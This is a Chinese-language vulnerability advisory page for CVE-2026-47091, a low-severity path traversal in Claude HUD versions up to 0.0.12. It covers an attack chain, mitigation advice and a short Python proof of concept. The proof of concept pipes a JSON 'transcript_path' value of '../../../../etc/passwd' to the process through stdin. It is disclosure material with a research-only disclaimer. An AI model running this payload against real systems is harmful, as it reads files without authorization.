CVE-2026-47091 CVSS 3.3 低危

CVE-2026-47091 Claude HUD路径遍历漏洞

披露日期: 2026-05-18

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-47091

漏洞类型

路径遍历

CVSS评分

3.3 低危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Claude HUD

漏洞概述

Claude HUD 在 0.0.12 及之前的版本中存在路径遍历漏洞。该漏洞允许攻击者通过标准输入（stdin）提供一个未经验证的 `transcript_path` JSON 值，从而读取任意文件。攻击者可以访问该进程有权读取的任何文件，且文件元数据会被写入权限不足的持久缓存文件中，导致访问路径的取证记录在进程退出后依然存在。

技术细节

该漏洞的根本原因在于应用程序未对通过 stdin 接收的 JSON 数据中的 `transcript_path` 字段进行严格的路径合法性校验。攻击者可以利用路径遍历序列（如 `../`）绕过目录限制，访问系统敏感文件（如 `/etc/passwd`）。利用成功后，应用程序不仅会读取文件内容，还会将访问过的文件路径和元数据持久化存储。由于缓存文件的权限设置不当，这些信息可能被泄露，造成信息安全隐患。根据 CVSS 向量，该漏洞需要本地访问权限和低权限用户，无需用户交互即可利用。

攻击链分析

STEP 1

信息收集

确认目标系统运行 Claude HUD 版本小于等于 0.0.12。

STEP 2

构造攻击载荷

攻击者构造包含恶意路径（例如 '../../../etc/passwd'）的 JSON 数据，赋值给 'transcript_path' 字段。

STEP 3

执行攻击

将构造好的 JSON 数据通过标准输入（stdin）传递给正在运行的 Claude HUD 进程。

STEP 4

数据泄露

应用程序读取指定文件内容，并将元数据写入权限不当的缓存文件，导致信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import subprocess
import json

# Target file to read (e.g., /etc/passwd)
malicious_path = "../../../../etc/passwd"

# Construct the malicious JSON payload
payload = {
    "transcript_path": malicious_path,
    "other_params": "value"
}

json_payload = json.dumps(payload)

# Simulate exploitation by sending payload via stdin to the vulnerable process
# Replace 'claude-hud' with the actual binary path or command
try:
    process = subprocess.Popen(
        ['claude-hud'],  # The vulnerable application
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
        text=True
    )
    
    stdout, stderr = process.communicate(input=json_payload)
    
    print("Exploit sent. Check cache file or output for results.")
    print("STDOUT:", stdout)
    print("STDERR:", stderr)
    
except FileNotFoundError:
    print("Vulnerable binary not found for testing.")

影响范围

Claude HUD <= 0.0.12

防御指南

临时缓解措施

建议尽快升级到修复后的版本。如果无法立即升级，应限制对 Claude HUD 的本地访问权限，并检查缓存文件以发现是否有未授权的文件访问记录。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表